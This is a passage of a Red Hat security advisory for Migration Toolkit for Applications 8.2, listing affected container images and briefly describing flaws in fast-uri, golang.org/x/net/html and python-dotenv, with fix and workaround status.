| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
A flaw was found in fast-uri. A remote attacker could exploit this vulnerability by crafting a malicious Uniform Resource Identifier (URI) that contains percent-encoded authority delimiters. The fast-uri library incorrectly decodes these delimiters during normalization and then re-emits them as raw separators, which can change the URI's intended authority. This issue allows applications that perform host allowlist checks, redirect validation, or outbound request routing to be steered to a different authority than specified, potentially bypassing security controls.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
A flaw was found in fast-uri. This vulnerability occurs because fast-uri fails to properly convert Unicode (Internationalized Domain Name - IDN) hostnames for HTTP-family URLs. This can lead to a situation where security policies, such as denylists or redirect validations, are bypassed when applications use fast-uri to enforce these policies before passing the URL to another parser. A remote attacker could exploit this to circumvent security controls and potentially access unauthorized resources or perform malicious redirects.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in golang.org/x/net/html. A remote attacker could exploit this vulnerability by providing specially crafted HTML. When this arbitrary HTML is parsed and rendered, it can result in an unexpected HTML tree, bypassing input sanitization. This can be leveraged to execute Cross-Site Scripting (XSS) attacks, potentially leading to arbitrary code execution in applications that use the affected component.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in golang.org/x/net/html. When arbitrary HTML is parsed and then rendered, it can result in an unexpected HTML tree. This allows an attacker to bypass HTML sanitization mechanisms, leading to Cross-Site Scripting (XSS) attacks in applications. Such attacks can result in information disclosure or arbitrary code execution.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in python-dotenv. A local attacker can exploit this by crafting a symbolic link, which the `set_key()` and `unset_key()` functions in python-dotenv follow when rewriting `.env` files. This can lead to the overwriting of arbitrary files on the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
